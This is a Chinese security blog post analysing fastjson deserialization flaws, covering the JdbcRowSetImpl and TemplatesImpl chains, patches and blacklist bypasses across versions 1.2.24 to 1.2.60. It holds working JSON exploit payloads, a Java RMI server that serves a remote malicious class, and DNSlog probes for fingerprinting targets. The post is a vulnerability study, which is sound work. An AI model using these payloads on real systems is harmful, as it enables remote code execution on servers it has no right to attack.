fastjson漏洞学习分析

0x00前言

前面写了fastjson的利用,现在补上fastjson的分析,后面附上探测后端是否使用fastjon的方法(1.2.67)。

0x01fastjson基本使用

toJSONString()
parseObject()

这两个函数一个将对象转化为json字符串,一个将json字符串反序列化成对象。


image.png

一般来说使用第一种方法输出json字符串,这里将第二种方法写出来,是想体现fastjson可以识别json中的一些特殊的属性,比如说如果json字符串中某个key是“@type”,它就认为该key对应的value用于指定该json字符串对应的对象类型。


image.png

可以看到带指定对象类型的参数都反序列化成功了,也就是说反序列化必须指定对象类型,但是实际开发中大多数时候是并不知道对象类型的,所以通常会将对象类型设置为Object.class,毕竟java中所有类都是Object的子类。然后通过@type的值确定对象类型。反序序列化的入口也是这个函数parseObject()。
image.png

我们可以看到,反序列化后的对象属性是有值的,说明它会自动调用对象的getter和setter方法。fastjson的反序列化漏洞就出现在这里,当json字符串可控时(就是我们经常抓包会在请求中看到一些json字符串,通过修改这些字符串),我们可以反序列化出任意对象,只需要找到某个对象的构造函数或属性的getter、setter方法中有危险操作,那么我们就可以通过构造json进行反序列化执行危险函数。

0x02TemplatesImpl利用链

这条链简单介绍一下,因为利用条件较苛刻。payload如下,bytecode属性装着是恶意class的base6
4编码。


image.png

通常情况fastjson只会反序列化公开的属性,而上面payload中,bytecode属性是一个私有属性,想反序列化私有属性必须设置Feature.SupportNonPublicField这个参数。
接下来看个例子。


image.png

可以看到普通的parseObject(),反序列化后私有属性是null的。在添加了Feature.SupportNonPublicField这个参数后才成功反序列化。也就是TemplatesImpl利用链必须开发在json反序列化添加Feature.SupportNonPublicField这个参数后才能成功。所以这里重点分析JdbcRowSetImpl利用链

0x03JdbcRowSetImpl利用链

在分析这条利用链前,首先要知道RMI、JDNI这两个概念。
RMI(remote method invocation)叫远程方法调用,Java环境设计的远程方法调用机制,远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法。


image.png

大概意思就是,首先开启一个RMI服务,然后客户端需要调用某个方法就到这里去查询,返回给客户端一个对象的引用,通过这个对象的引用去调用具体方法。
JNDI(Java Naming and Directory Interface)就是java命名和目录接口。JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现。


image.png

jndi大概就是一组api接口。每一个对象都有唯一的键值绑定,将名字和对象绑定,可以通过名字检索对象,对象就存储在rmi,ldap等服务。可以通过Search(),Lookup()之类的函数去查找远程对象。
客户端在用lookup()查找这个远程对象时,客户端会获取相应的object factory,最终通过factory类将reference转换为具体的对象实例。Reference是java中的引用类。

0x04环境准备

payload如下

{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://ip:port/Exploit",
        "autoCommit":true
}

先启动RMI服务

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class server {
    public static void start() throws
            AlreadyBoundException, RemoteException, NamingException {
        Registry registry = LocateRegistry.createRegistry(9999);
        String remote_class_server = "http://ip:port/";//恶意类远程地址
        Reference reference = new Reference("Exploit", "Exploit", remote_class_server);//第一个参数为恶意类名,第二个为factory。
        //reference的factory class参数指向了一个外部Web服务的地址
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("Exploit", referenceWrapper);

        System.out.println("Listener on 9999");
    }
    public static void main(String[] args) throws AlreadyBoundException, RemoteException, NamingException{
        start();
    }
}

编译一个恶意类


image.png

把他放到web服务器上,在RMI服务绑定好。


image.png

0x05开始调试1.2.24版本

入口函数parseObject()下断点开始调试。


image.png

跟到这,判断key是否是@type,如果是,便加载对应的class


image.png

继续跟,这里开始反序列化阶段。
image.png

具体操作就是通过反射调用 setter 方法赋值


image.png

我们的payload中有一个属性autoCommit为true。会调用下图方法
image.png

跟进
image.png

调用lookup()方法。
image.png

然后会去寻找我们写好的恶意rmi服务类。通过lookup方法就实例化了这个恶意类,从而导致构造方法的恶意代码触发。
image.png

完整利用链


image.png

结束

0x06官方补丁

image.png

可以看到把loadclass一行删除,新添了一个检查函数checkAutoType(),并且把com.sun设置为黑名单。

0x07补丁绕过

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://ip:port/Exploit"}}
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://ip:port/Exploit","autoCommit":true}

第一个payload就是找到了一个类不在黑名单里,第二个payload分析在原来的类,开头添加了L,尾添加了;,分析如下


image.png

添加了这两个字符后的类肯定不在黑名单里,然后跟到loadclass函数里,可以看到当以L开头;结尾是,会将这两个字符移除,又变成了com.sun.rowset.RowSetImpl。

0x08开始分析1.2.47版本

payload

{
   "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://ip:9999/Test",
        "autoCommit":true
    }
}

比之前版本多发送了一个java.lang.Class数据,开始调试看一下是怎么绕过的。


image.png

仍然跟到这,由于java.lang.Class不在黑名单里,checkAutoType不会拦截,然后跟到loadclass。


image.png

可以看到这里,因为我们传了一个属性"val":"com.sun.rowset.JdbcRowSetImpl",他去把这个作为对象加载了,虽然这个类被加载了,但是并没有传递到rmi属性和autoCommit属性,暂时并不会造成。成恶意影响。继续跟进
image.png

可以看到loadclass返回值里有一个cache属性为true。跟进


image.png

可以看到loadclass函数中,当cache为true是,会将JdbcRowSetImpl类加载到map缓存中。
第一个json数据处理完了,接下来看一下第二个json数据。
image.png

仍然跟到这,然后跟进checkAutoType()函数,看一下这个在黑名单中的类为什么没有被拦截。
image.png

可以看到当class为空时,会从mapping中去找。在第一个json数据处理后,JdbcRowSetImpl类已经被加载到map缓存,然后直接就返回class了,绕过了后面的检测。
在checkAutoType函数中,有一个配置就是autotype,默认这个是关闭的,接下来看一下当这个参数为true时的绕过。
image.png

首先在反序列化前新增一行代码设置为true。
跟进到checkAutoType函数,进入如下循环


image.png

先验证了白名单,如果匹配变返回class,这里不在白名单里。然后匹配黑名单,由于getClassMapping这个条件不为null所以即使匹配到黑名单,但是仍然不会爆异常。

0x09官方修复

把cache的默认值改成了false,不让Class生成的对象存在mapping里。
并且把java.lang.Class这个类加入了黑名单。

0x09 1.2.60版本payload

{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://ip:port/Exploit"}
"{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://ip:port/Exploit"}"

仍然利用的是rmi服务,找到了不在黑名单中了类,但是有2个利用条件。依赖的特定的jar(commons-configuration, ojdbc14-10.2.0.2),并不是中间件或者JDK自带的jar;需要手动开启AutoType。

0x10 总结

1、fastjson 通过@type的值传入类,在解析json时,就会调用传入属性的getter,setter方法。如果找到一个类getter,setter能够传入可控的恶意class字节码或者是jdni服务,就能导致rce。
2、fastjson的防范类是checkAutoType函数,而导致命令执行的很关键的一步是loadClass,因此从checkAutoType到loadClass之间的代码,是需要关注的关键部分。
3、对于官方已经修复但是还没有公开的漏洞,github的源码中的更改记录可能有利用思路。

0x11 更新下探测后端是否使用fastjon的方法

{"@type":"java.net.Inet4Address","val":"http://dnslog"}
{"@type":"java.net.Inet6Address","val":"http://dnslog"}

{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://dnslog"}}

{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}

Set[{"@type":"java.net.URL","val":"http://dnslog"}]

0x12 参考链接

https://github.com/alibaba/fastjson/issues/3077

0x13 更新后续利用——fastjson注入内存马

写的简单利用的burp插件
https://github.com/amaz1ngday/fastjson-exp

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 216,142评论 6 498
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 92,298评论 3 392
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 162,068评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 58,081评论 1 291
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 67,099评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 51,071评论 1 295
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,990评论 3 417
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,832评论 0 273
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 45,274评论 1 310
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,488评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,649评论 1 347
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,378评论 5 343
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,979评论 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,625评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,796评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,643评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,545评论 2 352